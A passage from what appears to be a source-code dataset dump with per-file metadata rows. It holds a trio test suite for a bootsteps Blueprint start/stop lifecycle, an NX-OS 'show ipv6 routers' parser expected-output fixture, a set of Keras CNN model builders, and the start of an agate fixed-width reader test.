    m.attach_mock(mock_step5, "mock_step5")
    m.attach_mock(mock_step6, "mock_step6")
    expected_execution_order = [
        [m.mock_step1, m.mock_step2],
        [m.mock_step3, m.mock_step4, m.mock_step5],
        [m.mock_step6],
    ]
    mock_iterator = MagicMock()
    # stop() iterates the strategy in reverse, so __reversed__ must be wired up.
    reversed_func = Mock(return_value=reversed(expected_execution_order))
    mock_iterator.__reversed__ = reversed_func
    mock_iterator.__iter__.return_value = expected_execution_order
    mock_execution_order_strategy_class.return_value = mock_iterator
    blueprint = Blueprint(
        bootsteps_graph,
        name="Test",
        execution_order_strategy_class=mock_execution_order_strategy_class,
    )
    async with trio.open_nursery() as nursery:
        nursery.start_soon(blueprint.stop)
        with trio.fail_after(1):
            assert (
                await blueprint.state_changes_receive_channel.receive()
                == BlueprintState.TERMINATING
            )
        with trio.fail_after(1):
            assert (
                await blueprint.state_changes_receive_channel.receive()
                == BlueprintState.TERMINATED
            )
    mock_execution_order_strategy_class.assert_called_once_with(blueprint._steps)
    # Only the two start/stop steps get stop() calls, last group first.
    assert_parallelized_steps_are_in_order(
        m.method_calls, [[call.mock_step4.stop()], [call.mock_step2.stop()]]
    )
    mock_step4.stop.assert_awaited_once_with()
    mock_step1.assert_not_called()
    mock_step3.assert_not_called()
    mock_step5.assert_not_called()
    mock_step6.assert_not_called()
    # Logging: one successful "stop" action for the blueprint.
    logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:stop")
    assert len(logged_actions) == 1
    logged_action = logged_actions[0]
    assert_log_message_field_equals(logged_action.start_message, "name", blueprint.name)
    assert_logged_action_succeeded(logged_action)
    # One "next_bootsteps" message per group that had stoppable steps.
    messages = LoggedMessage.of_type(
        logger.messages, "bootsteps:blueprint:next_bootsteps"
    )
    assert len(messages) == 2
    assert_log_message_field_equals(messages[0].message, "name", blueprint.name)
    assert_log_message_field_equals(
        messages[0].message, "next_bootsteps", [m.mock_step4]
    )
    assert_log_message_field_equals(messages[1].message, "name", blueprint.name)
    assert_log_message_field_equals(
        messages[1].message,
        "next_bootsteps",
        [m.mock_step2],
    )
    logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:executing_bootstep")
    assert len(logged_actions) == 2
    start_messages = [logged_action.start_message for logged_action in logged_actions]
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step4.stop)
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step2.stop)
    assert_logged_action_succeeded(logged_actions[0])
    assert_logged_action_succeeded(logged_actions[1])
async def test_blueprint_stop_failure(
    bootsteps_graph, mock_execution_order_strategy_class, logger
):
    """If a stop() call raises, shutdown aborts after that step, reports
    (FAILED, exc) on the state channel, and earlier groups are never stopped."""
    mock_step1 = create_mock_step("step1")
    mock_step2 = create_start_stop_mock_step("step2")
    mock_step3 = create_mock_step("step3")
    mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
    # step4.stop fails; the exception instance must surface on the channel.
    mock_step4.stop.side_effect = expected_exception = RuntimeError("Expected Failure")
    mock_step5 = create_mock_step("step5")
    mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
    # We're using a parent mock simply to record the order of calls to different
    # steps
    m = Mock()
    m.attach_mock(mock_step1, "mock_step1")
    m.attach_mock(mock_step2, "mock_step2")
    m.attach_mock(mock_step3, "mock_step3")
    m.attach_mock(mock_step4, "mock_step4")
    m.attach_mock(mock_step5, "mock_step5")
    m.attach_mock(mock_step6, "mock_step6")
    expected_execution_order = [
        [m.mock_step1, m.mock_step2],
        [m.mock_step3, m.mock_step4, m.mock_step5],
        [m.mock_step6],
    ]
    mock_iterator = MagicMock()
    mock_iterator.__iter__.return_value = expected_execution_order
    # stop() iterates the strategy in reverse, so __reversed__ must be wired up.
    reversed_func = Mock(return_value=reversed(expected_execution_order))
    mock_iterator.__reversed__ = reversed_func
    mock_execution_order_strategy_class.return_value = mock_iterator
    blueprint = Blueprint(
        bootsteps_graph,
        name="Test",
        execution_order_strategy_class=mock_execution_order_strategy_class,
    )
    # The nursery re-raises the stop step's RuntimeError once its tasks finish.
    with pytest.raises(RuntimeError):
        async with trio.open_nursery() as nursery:
            nursery.start_soon(blueprint.stop)
            with trio.fail_after(1):
                assert (
                    await blueprint.state_changes_receive_channel.receive()
                    == BlueprintState.TERMINATING
                )
            with trio.fail_after(1):
                assert await blueprint.state_changes_receive_channel.receive() == (
                    BlueprintState.FAILED,
                    expected_exception,
                )
    mock_execution_order_strategy_class.assert_called_once_with(blueprint._steps)
    # Only the failing stop() was attempted; nothing else was touched.
    assert_parallelized_steps_are_in_order(m.method_calls, [[call.mock_step4.stop()]])
    mock_step1.assert_not_called()
    mock_step2.stop.assert_not_called()
    mock_step3.assert_not_called()
    mock_step5.assert_not_called()
    mock_step6.assert_not_called()
    # The overall "stop" action is logged as failed.
    logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:stop")
    assert len(logged_actions) == 1
    logged_action = logged_actions[0]
    assert_log_message_field_equals(logged_action.start_message, "name", blueprint.name)
    assert_logged_action_failed(logged_action)
    messages = LoggedMessage.of_type(
        logger.messages, "bootsteps:blueprint:next_bootsteps"
    )
    assert len(messages) == 1, messages
    assert_log_message_field_equals(messages[0].message, "name", blueprint.name)
    assert_log_message_field_equals(
        messages[0].message, "next_bootsteps", [m.mock_step4]
    )
    logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:executing_bootstep")
    assert len(logged_actions) == 1
    start_messages = [logged_action.start_message for logged_action in logged_actions]
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step4.stop)
    assert_logged_action_failed(logged_actions[0])
async def test_blueprint_async_context_manager(
    bootsteps_graph, mock_execution_order_strategy_class
):
    """Using the blueprint as `async with` starts it on entry and stops it on
    exit: RUNNING -> COMPLETED inside the block, TERMINATING -> TERMINATED after."""
    mock_step1 = create_mock_step("step1")
    mock_step2 = create_start_stop_mock_step("step2")
    mock_step3 = create_mock_step("step3")
    mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
    mock_step5 = create_mock_step("step5")
    mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
    # We're using a parent mock simply to record the order of calls to different
    # steps
    m = Mock()
    m.attach_mock(mock_step1, "mock_step1")
    m.attach_mock(mock_step2, "mock_step2")
    m.attach_mock(mock_step3, "mock_step3")
    m.attach_mock(mock_step4, "mock_step4")
    m.attach_mock(mock_step5, "mock_step5")
    m.attach_mock(mock_step6, "mock_step6")
    expected_execution_order = [
        [m.mock_step1, m.mock_step2],
        [m.mock_step3, m.mock_step4, m.mock_step5],
        [m.mock_step6],
    ]
    mock_iterator = MagicMock()
    # __exit__ stops steps in reverse order, so __reversed__ must be wired up.
    reversed_func = Mock(return_value=reversed(expected_execution_order))
    mock_iterator.__reversed__ = reversed_func
    mock_iterator.__iter__.return_value = expected_execution_order
    mock_execution_order_strategy_class.return_value = mock_iterator
    blueprint = Blueprint(
        bootsteps_graph,
        name="Test",
        execution_order_strategy_class=mock_execution_order_strategy_class,
    )
    # Entry: the blueprint starts and completes within the block.
    async with blueprint:
        with trio.fail_after(1):
            assert (
                await blueprint.state_changes_receive_channel.receive()
                == BlueprintState.RUNNING
            )
        with trio.fail_after(1):
            assert (
                await blueprint.state_changes_receive_channel.receive()
                == BlueprintState.COMPLETED
            )
    # Exit: leaving the block triggers the shutdown transitions.
    with trio.fail_after(1):
        assert (
            await blueprint.state_changes_receive_channel.receive()
            == BlueprintState.TERMINATING
        )
    with trio.fail_after(1):
        assert (
            await blueprint.state_changes_receive_channel.receive()
            == BlueprintState.TERMINATED
        )
    # Start groups run forward, then stop() calls run in reverse group order.
    assert_parallelized_steps_are_in_order(
        m.method_calls,
        [
            [call.mock_step1(), call.mock_step2.start()],
            [call.mock_step3(), call.mock_step4.start(), call.mock_step5()],
            [call.mock_step6()],
            [call.mock_step4.stop()],
            [call.mock_step2.stop()],
        ],
    )
    mock_step6.assert_awaited_once_with()
    mock_step4.start.assert_awaited_once_with()
    mock_step4.stop.assert_awaited_once_with()
| 36.220532
| 100
| 0.726433
| 2,384
| 19,052
| 5.382131
| 0.062919
| 0.022212
| 0.051438
| 0.063128
| 0.915283
| 0.90258
| 0.875068
| 0.855039
| 0.843192
| 0.833294
| 0
| 0.017305
| 0.184075
| 19,052
| 525
| 101
| 36.289524
| 0.808106
| 0.026139
| 0
| 0.721823
| 0
| 0
| 0.063589
| 0.022922
| 0
| 0
| 0
| 0
| 0.258993
| 1
| 0.009592
| false
| 0
| 0.021583
| 0.004796
| 0.035971
| 0.170264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfc97828ba5f7d7cac524f9a6edad1429c2ebf44
| 4,407
|
py
|
Python
|
src/genie/libs/parser/nxos/tests/ShowIpv6Routers/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpv6Routers/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpv6Routers/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
# Expected parsed structure for this golden-output test: one entry per
# interface, each keyed by the advertising neighbor's link-local address,
# with that router's advertisement fields and advertised prefixes.
# NOTE(review): field order inside the per-prefix dicts varies between
# interfaces in this literal; dict equality ignores order, so this is benign.
expected_output = {
    "interfaces": {
        "Ethernet1/3": {
            "neighbors": {
                "fe80::f816:3eff:feff:9f9b": {
                    "homeagent_flag": 0,
                    "is_router": True,
                    "addr_flag": 0,
                    "ip": "fe80::f816:3eff:feff:9f9b",
                    "lifetime": 1800,
                    "current_hop_limit": 64,
                    "retransmission_time": 0,
                    "last_update": "2.8",
                    "mtu": 1500,
                    "preference": "medium",
                    "other_flag": 0,
                    "reachable_time": 0,
                    "prefix": {
                        "2001:db8:c56d:1::/64": {
                            "preferred_lifetime": 604800,
                            "valid_lifetime": 2592000,
                            "autonomous_flag": 1,
                            "onlink_flag": 1,
                        }
                    }
                }
            },
            "interface": "Ethernet1/3"
        },
        "Ethernet1/1": {
            "neighbors": {
                "fe80::f816:3eff:feff:e5a2": {
                    "homeagent_flag": 0,
                    "is_router": True,
                    "addr_flag": 0,
                    "ip": "fe80::f816:3eff:feff:e5a2",
                    "lifetime": 1800,
                    "current_hop_limit": 64,
                    "retransmission_time": 0,
                    "last_update": "3.2",
                    "mtu": 1500,
                    "preference": "medium",
                    "other_flag": 0,
                    "reachable_time": 0,
                    "prefix": {
                        "2001:db8:c56d:4::/64": {
                            "preferred_lifetime": 604800,
                            "valid_lifetime": 2592000,
                            "autonomous_flag": 1,
                            "onlink_flag": 1,
                        }
                    }
                }
            },
            "interface": "Ethernet1/1"
        },
        "Ethernet1/4": {
            "neighbors": {
                "fe80::f816:3eff:feff:4908": {
                    "homeagent_flag": 0,
                    "is_router": True,
                    "addr_flag": 0,
                    "ip": "fe80::f816:3eff:feff:4908",
                    "lifetime": 1800,
                    "current_hop_limit": 64,
                    "retransmission_time": 0,
                    "last_update": "2.3",
                    "mtu": 1500,
                    "preference": "medium",
                    "other_flag": 0,
                    "reachable_time": 0,
                    "prefix": {
                        "2001:db8:c8d1:1::/64": {
                            "preferred_lifetime": 604800,
                            "autonomous_flag": 1,
                            "valid_lifetime": 2592000,
                            "onlink_flag": 1,
                        }
                    }
                }
            },
            "interface": "Ethernet1/4"
        },
        "Ethernet1/2": {
            "neighbors": {
                "fe80::f816:3eff:feff:e455": {
                    "homeagent_flag": 0,
                    "is_router": True,
                    "addr_flag": 0,
                    "ip": "fe80::f816:3eff:feff:e455",
                    "lifetime": 1800,
                    "current_hop_limit": 64,
                    "retransmission_time": 0,
                    "last_update": "1.5",
                    "mtu": 1500,
                    "preference": "medium",
                    "other_flag": 0,
                    "reachable_time": 0,
                    "prefix": {
                        "2001:db8:c8d1:4::/64": {
                            "preferred_lifetime": 604800,
                            "onlink_flag": 1,
                            "valid_lifetime": 2592000,
                            "autonomous_flag": 1,
                        },
                        "2001:db8:888c:4::/64": {
                            "preferred_lifetime": 604800,
                            "onlink_flag": 1,
                            "valid_lifetime": 2592000,
                            "autonomous_flag": 1,
                        }
                    }
                }
            },
            "interface": "Ethernet1/2"
        }
    }
}
| 36.421488
| 57
| 0.319492
| 288
| 4,407
| 4.690972
| 0.194444
| 0.044412
| 0.071058
| 0.094745
| 0.916358
| 0.757957
| 0.757957
| 0.757957
| 0.757957
| 0.757957
| 0
| 0.145304
| 0.562741
| 4,407
| 120
| 58
| 36.725
| 0.555786
| 0
| 0
| 0.576271
| 0
| 0
| 0.300568
| 0.045403
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c64328fbca10492a313313e0c42e36863e35caf
| 73
|
py
|
Python
|
dm_gym/utils/__init__.py
|
ashwin-M-D/DM-Gym
|
f468c175d16b09d88edc21d77b6755ca2d35fc13
|
[
"BSD-3-Clause"
] | null | null | null |
dm_gym/utils/__init__.py
|
ashwin-M-D/DM-Gym
|
f468c175d16b09d88edc21d77b6755ca2d35fc13
|
[
"BSD-3-Clause"
] | null | null | null |
dm_gym/utils/__init__.py
|
ashwin-M-D/DM-Gym
|
f468c175d16b09d88edc21d77b6755ca2d35fc13
|
[
"BSD-3-Clause"
] | null | null | null |
from dm_gym.utils.data_gen import *
from dm_gym.utils.livegraph import *
| 24.333333
| 36
| 0.808219
| 13
| 73
| 4.307692
| 0.615385
| 0.214286
| 0.321429
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 37
| 36.5
| 0.861538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5ca5d7d628e05105b3d5c578b83330687b5d4823
| 11,472
|
py
|
Python
|
src/volumetric_src/network_training/networks.py
|
tjosc/Protein-Structure-Exploration
|
6b25affa1ccceb3ebf5d7236861bc0cbcd3d7ad8
|
[
"MIT"
] | null | null | null |
src/volumetric_src/network_training/networks.py
|
tjosc/Protein-Structure-Exploration
|
6b25affa1ccceb3ebf5d7236861bc0cbcd3d7ad8
|
[
"MIT"
] | null | null | null |
src/volumetric_src/network_training/networks.py
|
tjosc/Protein-Structure-Exploration
|
6b25affa1ccceb3ebf5d7236861bc0cbcd3d7ad8
|
[
"MIT"
] | 1
|
2019-04-04T19:06:15.000Z
|
2019-04-04T19:06:15.000Z
|
'''
networks.py
Updated: 12/29/17
README:
'''
# For Neural Network
from keras.models import Model
from keras.optimizers import Adam
from keras.metrics import categorical_accuracy
from keras.losses import categorical_crossentropy
from keras.layers.normalization import BatchNormalization
from keras.layers import Conv1D, GlobalMaxPooling1D, MaxPooling1D, Dropout, Add, Dense, Input, Activation
from keras.layers import Conv2D, MaxPooling2D, Dropout, Input, Flatten, Dense, Concatenate
from keras.layers import Conv3D, AveragePooling2D, Activation, MaxPooling3D
from keras.optimizers import SGD, Adam, Adamax, Adadelta, RMSprop
from keras.constraints import maxnorm
################################################################################
def D1NET_v1(nb_chans, nb_class):
    '''
    1D CNN: two Conv1D(kernel=64)/MaxPooling1D stages over a 262144-sample
    sequence, then a 128-unit dense layer and softmax classifier.
    Returns (model, loss, optimizer, metrics) for compile().
    Parameters w/ 8 Chans:: 242,114
    Parameters w/ 1 Chans: 228,810
    '''
    # Fix: MaxPooling1D was used here but never imported from keras.layers
    # (the import line only pulled GlobalMaxPooling1D), so calling this
    # function raised NameError; the import block now includes it.
    # Input Layer
    x = Input(shape=(262144, nb_chans))
    # Layers
    l = Conv1D(filters=32, kernel_size=64, strides=9, padding='valid', activation='relu')(x)
    l = MaxPooling1D(9)(l)
    l = Conv1D(filters=32, kernel_size=64, strides=9, padding='valid', activation='relu')(l)
    l = MaxPooling1D(9)(l)
    l = Flatten()(l)
    l = Dense(128, activation='relu')(l)
    # Dropout regularizes the dense layer before classification.
    l = Dropout(0.5)(l)
    # Output Layer
    y = Dense(nb_class, activation='softmax')(l)
    model = Model(inputs=x, outputs=y)
    loss = categorical_crossentropy
    optimizer = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.1e-6)
    metrics = [categorical_accuracy,]
    return model, loss, optimizer, metrics
def D1NET_v2(nb_chans, nb_class):
    '''
    1D CNN identical to D1NET_v1 except kernel_size=121 in both conv stages.
    Returns (model, loss, optimizer, metrics) for compile().
    Parameters w/ 8 Chans:: 310,978
    Parameters w/ 1 Chans: 284,906
    '''
    # Fix: MaxPooling1D was used here but never imported from keras.layers;
    # the import block now includes it (previously NameError at call time).
    # Input Layer
    x = Input(shape=(262144, nb_chans))
    # Layers
    l = Conv1D(filters=32, kernel_size=121, strides=9, padding='valid', activation='relu')(x)
    l = MaxPooling1D(9)(l)
    l = Conv1D(filters=32, kernel_size=121, strides=9, padding='valid', activation='relu')(l)
    l = MaxPooling1D(9)(l)
    l = Flatten()(l)
    l = Dense(128, activation='relu')(l)
    # Dropout regularizes the dense layer before classification.
    l = Dropout(0.5)(l)
    # Output Layer
    y = Dense(nb_class, activation='softmax')(l)
    model = Model(inputs=x, outputs=y)
    loss = categorical_crossentropy
    optimizer = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.1e-6)
    metrics = [categorical_accuracy,]
    return model, loss, optimizer, metrics
def D1NET_v3(nb_chans, nb_class):
    """Build a two-stage 1-D conv classifier (kernel size 225).

    Parameters w/ 8 Chans:: 440,002
    Parameters w/ 1 Chans: 390,634
    """
    inputs = Input(shape=(262144, nb_chans))
    net = inputs
    # Two identical conv/pool stages.
    for _ in range(2):
        net = Conv1D(filters=32, kernel_size=225, strides=9,
                     padding='valid', activation='relu')(net)
        net = MaxPooling1D(9)(net)
    # Dense classifier head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D2NET_v1(nb_chans, nb_class):
    """Build a two-stage 2-D conv classifier on 512x512 inputs (8x8 kernels).

    Parameters w/ 8 Chans:: 184,770
    Parameters w/ 1 Chans: 171,466
    """
    inputs = Input(shape=(512, 512, nb_chans))
    net = inputs
    # Two identical conv/pool stages.
    for _ in range(2):
        net = Conv2D(32, (8, 8), strides=(3, 3), padding='valid', activation='relu')(net)
        net = MaxPooling2D((3, 3))(net)
    # Fully connected head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D2NET_v2(nb_chans, nb_class):
    """Build a two-stage 2-D conv classifier on 512x512 inputs (11x11 kernels).

    Parameters w/ 8 Chans:: 257,730
    Parameters w/ 1 Chans: 231,658
    """
    inputs = Input(shape=(512, 512, nb_chans))
    net = inputs
    # Two identical conv/pool stages.
    for _ in range(2):
        net = Conv2D(32, (11, 11), strides=(3, 3), padding='valid', activation='relu')(net)
        net = MaxPooling2D((3, 3))(net)
    # Fully connected head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D2NET_v3(nb_chans, nb_class):
    """Build a two-stage 2-D conv classifier on 512x512 inputs (15x15 kernels).

    Parameters w/ 8 Chans:: 353,986
    Parameters w/ 1 Chans: 304,618
    """
    inputs = Input(shape=(512, 512, nb_chans))
    net = inputs
    # Two identical conv/pool stages.
    for _ in range(2):
        net = Conv2D(32, (15, 15), strides=(3, 3), padding='valid', activation='relu')(net)
        net = MaxPooling2D((3, 3))(net)
    # Fully connected head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D2NET_v4(nb_chans, nb_class):
    """Build a three-stage 2-D conv classifier (8x8 kernels, stride 2).

    Parameters w/ 8 Chans:
    Parameters w/ 1 Chans:
    """
    inputs = Input(shape=(512, 512, nb_chans))
    net = inputs
    # Three identical conv/pool stages.
    for _ in range(3):
        net = Conv2D(32, (8, 8), strides=(2, 2), padding='valid', activation='relu')(net)
        net = MaxPooling2D((2, 2))(net)
    # Fully connected head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D2NET_v5(nb_chans, nb_class):
    """Build a four-stage 2-D conv classifier (8x8 kernels, stride 2 then 1).

    Parameters w/ 8 Chans:
    Parameters w/ 1 Chans:
    """
    inputs = Input(shape=(512, 512, nb_chans))
    net = inputs
    # First stage downsamples with stride 2; the rest use stride 1.
    for stride in ((2, 2), (1, 1), (1, 1), (1, 1)):
        net = Conv2D(32, (8, 8), strides=stride, padding='valid', activation='relu')(net)
        net = MaxPooling2D((2, 2))(net)
    # Fully connected head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def RESNET_v1(nb_chans, nb_class):
    """Build a small residual 2-D conv classifier on 512x512 inputs.

    Parameters w/ 8 Chans::
    """
    from keras.layers import Add, Activation

    def shortcut_block(tensor):
        # Identity-shortcut block: conv-relu, conv, add, relu.
        branch = Conv2D(32, (8, 8), strides=(1, 1), padding='same', activation='relu')(tensor)
        branch = Conv2D(32, (8, 8), strides=(1, 1), padding='same')(branch)
        return Activation('relu')(Add()([tensor, branch]))

    inputs = Input(shape=(512, 512, nb_chans))
    # 1x1 projection so the shortcut add has matching channel counts.
    net = Conv2D(32, (1, 1), strides=(1, 1), padding='same')(inputs)
    net = MaxPooling2D((9, 9))(shortcut_block(net))
    net = MaxPooling2D((9, 9))(shortcut_block(net))
    # Fully connected head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D3NET_v1(nb_chans, nb_class):
    """Build a two-stage 3-D conv classifier on 64^3 inputs (4^3 kernels).

    Parameters w/ 8 Chans:: 192,962
    Parameters w/ 1 Chans: 179,658
    """
    inputs = Input(shape=(64, 64, 64, nb_chans))
    net = inputs
    # Two identical conv/pool stages.
    for _ in range(2):
        net = Conv3D(32, (4, 4, 4), strides=(2, 2, 2), activation='relu', padding='valid')(net)
        net = MaxPooling3D(pool_size=(2, 2, 2))(net)
    # Dense classifier head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D3NET_v2(nb_chans, nb_class):
    """Build a two-stage 3-D conv classifier on 64^3 inputs (5^3 kernels).

    Parameters w/ 8 Chans:: 271,042
    Parameters w/ 1 Chans: 244,074
    """
    inputs = Input(shape=(64, 64, 64, nb_chans))
    net = inputs
    # Two identical conv/pool stages.
    for _ in range(2):
        net = Conv3D(32, (5, 5, 5), strides=(2, 2, 2), activation='relu', padding='valid')(net)
        net = MaxPooling3D(pool_size=(2, 2, 2))(net)
    # Dense classifier head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D3NET_v3(nb_chans, nb_class):
    """Build a two-stage 3-D conv classifier on 64^3 inputs (6^3 kernels).

    Parameters w/ 8 Chans:: 309,698
    Parameters w/ 1 Chans: 262,346
    """
    inputs = Input(shape=(64, 64, 64, nb_chans))
    net = inputs
    # Two identical conv/pool stages.
    for _ in range(2):
        net = Conv3D(32, (6, 6, 6), strides=(2, 2, 2), activation='relu', padding='valid')(net)
        net = MaxPooling3D(pool_size=(2, 2, 2))(net)
    # Dense classifier head.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(nb_class, activation='softmax')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, categorical_crossentropy, opt, [categorical_accuracy]
def D2NETREG_v1(nb_chans):
    """Build a two-stage 2-D conv regressor: sigmoid scalar output, MSE loss."""
    from keras.losses import mean_squared_error
    inputs = Input(shape=(512, 512, nb_chans))
    net = inputs
    # Two identical conv/pool stages.
    for _ in range(2):
        net = Conv2D(32, (8, 8), strides=(3, 3), padding='valid', activation='relu')(net)
        net = MaxPooling2D((3, 3))(net)
    # Fully connected head with a single sigmoid regression unit.
    net = Flatten()(net)
    net = Dense(128, activation='relu')(net)
    net = Dropout(0.5)(net)
    outputs = Dense(1, activation='sigmoid')(net)
    model = Model(inputs=inputs, outputs=outputs)
    opt = Adam(lr=0.0001, decay=0.1e-6)
    return model, mean_squared_error, opt, ['accuracy']
| 31.005405
| 93
| 0.613319
| 1,683
| 11,472
| 4.114676
| 0.095663
| 0.017617
| 0.054152
| 0.057762
| 0.847076
| 0.840289
| 0.834657
| 0.831191
| 0.826859
| 0.770542
| 0
| 0.087671
| 0.204585
| 11,472
| 369
| 94
| 31.089431
| 0.671233
| 0.08682
| 0
| 0.745455
| 0
| 0
| 0.042452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059091
| false
| 0
| 0.054545
| 0
| 0.172727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ce42b56528ba7523255614982035678a030ad24
| 1,772
|
py
|
Python
|
tests/test_fixed.py
|
andriyor/agate
|
9b12d4bcc75bf3788e0774e23188f4409c3e7519
|
[
"MIT"
] | 663
|
2016-02-16T13:43:00.000Z
|
2022-03-13T17:21:19.000Z
|
tests/test_fixed.py
|
andriyor/agate
|
9b12d4bcc75bf3788e0774e23188f4409c3e7519
|
[
"MIT"
] | 347
|
2015-08-28T13:46:37.000Z
|
2016-02-16T01:53:06.000Z
|
tests/test_fixed.py
|
andriyor/agate
|
9b12d4bcc75bf3788e0774e23188f4409c3e7519
|
[
"MIT"
] | 122
|
2016-02-23T02:43:24.000Z
|
2022-03-04T17:21:14.000Z
|
#!/usr/bin/env python
try:
import unittest2 as unittest
except ImportError:
import unittest
from agate import csv, fixed
class TestFixed(unittest.TestCase):
    """Verify the fixed-width readers agree with the converted CSV fixtures."""

    def _read_fixed(self, factory):
        # Parse the fixed-width example with the given reader factory,
        # capturing fieldnames while the files are still open.
        with open('examples/testfixed') as f:
            with open('examples/testfixed_schema.csv') as schema_f:
                reader = factory(f, schema_f)
                rows = list(reader)
                names = reader.fieldnames
        return names, rows

    def test_reader(self):
        with open('examples/testfixed_converted.csv') as f:
            csv_reader = csv.Reader(f)
            expected_header = next(csv_reader)
